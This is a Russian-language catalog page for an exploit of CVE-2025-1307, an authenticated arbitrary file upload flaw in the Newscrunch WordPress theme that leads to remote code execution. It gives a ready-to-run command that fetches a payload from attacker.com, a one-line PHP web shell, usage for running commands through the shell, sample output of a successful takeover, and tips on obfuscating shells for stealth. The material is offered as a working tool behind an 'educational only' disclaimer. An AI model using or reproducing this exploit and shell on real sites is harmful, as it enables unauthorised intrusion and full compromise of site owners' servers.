Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/nxploited/cve-2025-1307
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubnxploited/cve-2025-1307

CVE-2025-1307

Newscrunch <= 1.8.4 - Аутентифицированный (Подписчик+) Произвольная загрузка файлов

Репозиторий
211 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт Newscrunch (CVE-2025-1307)

🚨 Обзор

Данный эксплойт нацелен на критическую уязвимость (CVE-2025-1307) в теме Newscrunch WordPress. Ошибка позволяет аутентифицированным пользователям (начиная с подписчика) загружать произвольные файлы из-за отсутствия проверки прав доступа в функции newscrunch_install_and_activate_plugin(). Это может привести к удалённому выполнению кода (RCE), полностью скомпрометировав уязвимый сайт WordPress.


🔥 Детали уязвимости

  • CVE ID: CVE-2025-1307
  • Затронутое ПО: Тема Newscrunch WordPress (<= 1.8.4.1)
  • CWE Классификация: CWE-862 — Отсутствие авторизации
  • CVSS Оценка: 9.8 (Критическая)
  • Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Дата публикации: 4 марта 2025 г.

🛑 Серьёзность и последствия

  • ✅ Удалённое выполнение кода (RCE)
  • ✅ Полная компрометация системы
  • ✅ Несанкционированная загрузка файлов
  • ✅ Риск повышения привилегий

Эксплуатируемость: Требуется действующая учётная запись WordPress с правами подписчика или выше.


📜 Возможности скрипта

✅ Автоматическая эксплуатация CVE-2025-1307
✅ Автоопределение уязвимой версии темы
✅ Автоматическая распаковка и выполнение ZIP-полезной нагрузки
✅ Динамическое получение имени файла оболочки из ZIP
✅ Автоматическая проверка доступности оболочки после эксплуатации
✅ Чистое и структурированное логирование для отладки


🚀 Как использовать

📌 Предварительные требования

Убедитесь, что у вас установлен Python 3.x и установлены необходимые зависимости:

root@kitploit:~
pip install requests urllib3 packaging

🔧 Запуск эксплойта

root@kitploit:~
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"

🔹 Использование

root@kitploit:~
Эксплойт для CVE-2025-1307 в теме Newscrunch WordPress от Nxploit | Khaled Alenazi

опции:
  -h, --help            показать это справочное сообщение и выйти
  -u URL, --url URL     Целевой URL WordPress (например, https://example.com)
  -un USERNAME, --username USERNAME
                        Имя пользователя WordPress
  -p PASSWORD, --password PASSWORD
                        Пароль WordPress
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        URL вредоносного файла для загрузки

🛠️ Использование загруженной оболочки

После успешной загрузки оболочки она позволяет удалённо выполнять команды на целевой системе. Файл оболочки должен находиться внутри ZIP-архива; он будет автоматически извлечён при эксплуатации.

🔹 Создание ZIP-полезной нагрузки

Убедитесь, что ваша PHP-оболочка (shell.php) находится внутри ZIP-архива. Затем загрузите ZIP-файл с помощью эксплойта.

root@kitploit:~
<?php system($_GET['cmd']); ?>

🔹 Выполнение команд

Вы можете выполнять системные команды через браузер, добавив параметр cmd к URL оболочки:

root@kitploit:~
http://target/wp-content/plugins/shell.php?cmd=whoami

⚠️ Защита оболочки

  • Поскольку это простая веб-оболочка, у неё нет аутентификации, и её следует использовать с осторожностью.
  • При обнаружении она может быть легко удалена администраторами.
  • Рассмотрите возможность использования обфусцированного PHP-кода или оболочек, защищённых паролем, для скрытных операций.

🔹 Ожидаемый вывод

root@kitploit:~
[+] Обнаружена версия темы Newscrunch: 1.8.4
[+] Эксплуатация возможна, продолжаем...
[*] Вход в систему...
[+] Вход выполнен успешно.
[*] Загрузка и распаковка полезной нагрузки...
[+] Эксплойт выполнен успешно. Вредоносный файл загружен.
[*] Проверка доступности оболочки: http://target/wp-content/plugins/U.php
[+] Оболочка успешно загружена и доступна: http://target/wp-content/plugins/U.php?cmd=ls

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и исследований в области безопасности. Несанкционированная эксплуатация уязвимостей является незаконной и наказуема по закону. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным инструментом. Используйте ответственно.

Автор: Nxploit | Khaled Alenazi

Скачать инструмент